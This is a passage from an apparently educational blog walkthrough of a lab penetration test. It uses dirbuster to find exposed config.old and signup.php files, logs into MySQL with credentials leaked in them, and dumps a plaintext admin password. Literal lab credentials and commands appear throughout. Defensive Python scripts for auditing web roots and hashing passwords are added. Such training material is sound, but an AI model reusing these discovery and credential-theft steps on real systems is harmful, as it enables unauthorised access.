    Moreover, we do not have any valid credentials to use, and the login form does not appear to be vulnerable to SQL injection.


    Find hidden files


    Since we do not want to brute-force the login form, we can try to run discovery tools such as dirbuster in order to find hidden files that may help us with our goal.



    Penetration Testing on Internal Web Application



    Let us start dirbuster and run a scan using the directory-list-2.3-small.txt wordlist. After a minute or two, we should start getting some interesting results:




    Penetration Testing on Internal Web Application






    Here we can see that in the include folder there is a file named config.old. Let us inspect it and see if there is anything interesting in it:




    Penetration Testing on Internal Web Application



    As we can see, the file contains some database credentials! If you recall, in the previous steps we had found a machine running MySQL. Let us try a DB connection to this machine with the credentials just found:


    ┌──(hackerboy㉿KumarAtulJaiswal)-[~]
    └─$ mysql -u awd -pUcuijsQgGOFILdjdL8D -h 10.104.11.198
    ERROR 1045 (28000): Access denied for user 'awd'@10.104.11.10' (using password: YES)
                                                                                                                                          
    ┌──(hackerboy㉿KumarAtulJaiswal)-[~]
    └─$                                                                                                                             
    
    
    


    Unfortunately, it seems that the credentials are not valid. Let us keep investigating the files found with dirbuster. If we check the previous screenshot, we can see that there is a page named signup.php that we were not able to access from the links in the web application:



    Penetration Testing on Internal Web Application


    This is even better than the previous file found!
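    Both findings so far are the same mistake seen from two sides: a copy of a configuration file left in the web root (config.old, which Apache serves as plain text instead of executing) and credentials hard-coded in application source. The script below is an added example, not part of the original post or of the lab: it audits a web root for backup-style file names and for password-looking assignments in source, and reports only the file, line and key name, never the value. The sample web root is constructed in a temporary directory with placeholder passwords; file names mirror the ones found above.

```python
import os
import re
import tempfile

# Suffixes that editors and admins leave behind; a web server serves these as
# plain text rather than running them, so any secret inside is readable.
BACKUP_SUFFIXES = (".old", ".bak", ".orig", ".save", ".swp", "~")

# Quoted value assigned to a password-like key, e.g.
#   $db_pass = 'x';   define('DB_PASSWORD', 'x');   password: "x"
SECRET_RE = re.compile(
    r"""(?i)(password|passwd|pass|secret|api_key)['"]?\s*[=:,]\s*['"]([^'"]{4,})['"]"""
)


def audit_webroot(root):
    """Return sorted (kind, relative_path, detail) findings for a web root."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            rel = os.path.relpath(path, root)
            if name.endswith(BACKUP_SUFFIXES):
                findings.append(("backup-file", rel, ""))
            try:
                with open(path, "r", errors="replace") as fh:
                    for lineno, line in enumerate(fh, 1):
                        m = SECRET_RE.search(line)
                        if m:
                            # Key name only: the audit log must not become a
                            # second copy of the secret.
                            findings.append(("hardcoded-secret", rel,
                                             f"line {lineno}: {m.group(1)}"))
            except OSError:
                continue
    return sorted(findings)


def build_sample_webroot():
    """Constructed web root mimicking the layout found above; passwords are
    placeholders, not values from the lab."""
    root = tempfile.mkdtemp(prefix="webroot-")
    os.makedirs(os.path.join(root, "include"))
    samples = {
        "index.php": "<?php include 'include/config.php'; ?>\n",
        # Clean: the live config reads secrets from the environment.
        "include/config.php": "<?php\n$db_host = getenv('DB_HOST');\n"
                              "$db_pass = getenv('DB_PASS');\n",
        # Stale copy with a literal password, served as text by the web server.
        "include/config.old": "<?php\n$db_user = 'awd';\n"
                              "$db_pass = 'PLACEHOLDER_OLD_PASSWORD';\n",
        # Source with a hard-coded credential.
        "signup.php": "<?php\ndefine('DB_PASSWORD', 'PLACEHOLDER_PASSWORD');\n",
    }
    for rel, body in samples.items():
        with open(os.path.join(root, rel), "w") as fh:
            fh.write(body)
    return root


if __name__ == "__main__":
    for kind, rel, detail in audit_webroot(build_sample_webroot()):
        print(f"{kind:17} {rel:22} {detail}")
```

    Running this from a deployment pipeline (or as a cron job on the web host) catches the config.old class of mistake before dirbuster does; the remaining fix is to keep secrets out of the web root altogether, in environment variables or a file outside the document root.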


    Test the credentials found


    Let us try the credentials found in the signup.php file and see if we are able to access the DB!

     

    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/Penetration-tester-jr]
    └─$ mysql -u awdmgmt -pUChxKQk96dVtM07 -h 10.104.11.198               130 ⨯
    Welcome to the MariaDB monitor.  Commands end with ; or \g.
    Your MySQL connection id is 241
    Server version: 5.5.38-0+wheezy1 (Debian)
    
    Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.
    
    Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
    
    MySQL [(none)]>
    
    

     

     



    As we can see, this time we are successfully logged into the database! Let us inspect it!



    Retrieve the correct admin password


    Let us use some simple MySQL commands to navigate the database and check if there is anything interesting in it. First, we will have to select the database to use and then inspect its tables and data, as follows:


    MySQL [(none)]> use awdmgmt_accounts;
    Reading table information for completion of table and column names
    You can turn off this feature to get a quicker startup with -A
    
    Database changed
    MySQL [awdmgmt_accounts]> show tables;
    +----------------------------+
    | Tables_in_awdmgmt_accounts |
    +----------------------------+
    | accounts                   |
    +----------------------------+
    1 row in set (0.528 sec)
    
    MySQL [awdmgmt_accounts]> select * from accounts;
    +----+--------------------+----------+-------------+
    | id | email              | password | displayname |
    +----+--------------------+----------+-------------+
    |  1 | admin@awdmgmt.labs | ENS7VvW8 | Admin       |
    +----+--------------------+----------+-------------+
    1 row in set (0.898 sec)
    
    MySQL [awdmgmt_accounts]> 
    
    
    


    With the information just obtained, let us try to log into the web application:



    Penetration Testing on Internal Web Application
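    The accounts table above stores the admin password in clear text, so anyone who can read the table (as we just did) can log in directly. As an added example that is not part of the original post, here is how the application side of that finding is fixed: every stored password is replaced with a salted PBKDF2 hash and login verifies against the hash. It uses a constructed in-memory SQLite copy of the table with a placeholder password; the table and column names come from the output above, the function names are my own.

```python
import hashlib
import hmac
import os
import sqlite3

ITERATIONS = 600_000  # PBKDF2-HMAC-SHA256 work factor (OWASP 2023 guidance)


def hash_password(password, salt=None):
    """Return a self-describing string: algorithm$iterations$salt$digest."""
    salt = os.urandom(16) if salt is None else salt
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, ITERATIONS)
    return f"pbkdf2_sha256${ITERATIONS}${salt.hex()}${digest.hex()}"


def is_hashed(stored):
    return stored.startswith("pbkdf2_sha256$") and stored.count("$") == 3


def verify_password(password, stored):
    """Constant-time comparison against a stored hash; plaintext rows never verify."""
    if not is_hashed(stored):
        return False
    _algo, iters, salt_hex, digest_hex = stored.split("$")
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(),
                                 bytes.fromhex(salt_hex), int(iters))
    return hmac.compare_digest(digest.hex(), digest_hex)


# Hash checked when the user does not exist, so that a missing account costs
# the same time as a wrong password and cannot be enumerated by timing.
DUMMY_HASH = hash_password("")


def open_sample_db():
    """Constructed in-memory copy of the accounts table seen above, with a
    placeholder in place of the real plaintext password."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE accounts (id INTEGER PRIMARY KEY, email TEXT UNIQUE, "
               "password TEXT, displayname TEXT)")
    db.execute("INSERT INTO accounts VALUES (1, 'admin@awdmgmt.labs', "
               "'PLACEHOLDER_ADMIN_PW', 'Admin')")
    db.commit()
    return db


def migrate_plaintext_passwords(db):
    """One-off migration: hash every row that still holds a plaintext value.
    Returns the number of rows rewritten."""
    migrated = 0
    for row_id, stored in db.execute("SELECT id, password FROM accounts").fetchall():
        if not is_hashed(stored):
            db.execute("UPDATE accounts SET password = ? WHERE id = ?",
                       (hash_password(stored), row_id))
            migrated += 1
    db.commit()
    return migrated


def login(db, email, password):
    """Parameterised lookup plus hash verification; never compares plaintext."""
    row = db.execute("SELECT password FROM accounts WHERE email = ?", (email,)).fetchone()
    if row is None:
        verify_password(password, DUMMY_HASH)
        return False
    return verify_password(password, row[0])


if __name__ == "__main__":
    conn = open_sample_db()
    print("rows migrated:", migrate_plaintext_passwords(conn))
    print("stored now:", conn.execute("SELECT password FROM accounts").fetchone()[0][:40], "...")
    print("login ok:", login(conn, "admin@awdmgmt.labs", "PLACEHOLDER_ADMIN_PW"))
    print("login bad:", login(conn, "admin@awdmgmt.labs", "guess"))
```

    After the migration a dump of the table no longer yields a usable password, and the exposed database credentials found earlier would still have to be paired with an offline guessing effort against a deliberately slow hash. The migration only works because the plaintext is still available; a site that cannot run it should force a reset instead.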


    Disclaimer

     

    All tutorials are for informational and educational purposes only and have been made using our own routers, servers, websites and other vulnerable free resources. They do not contain any illegal activity. We believe that ethical hacking, information security and cyber security should be familiar subjects to anyone using digital information and computers. Hacking Truth is against misuse of the information and we strongly suggest against it. Please regard the word hacking as ethical hacking or penetration testing every time this word is used. We do not promote, encourage, support or excite any illegal activity or hacking.


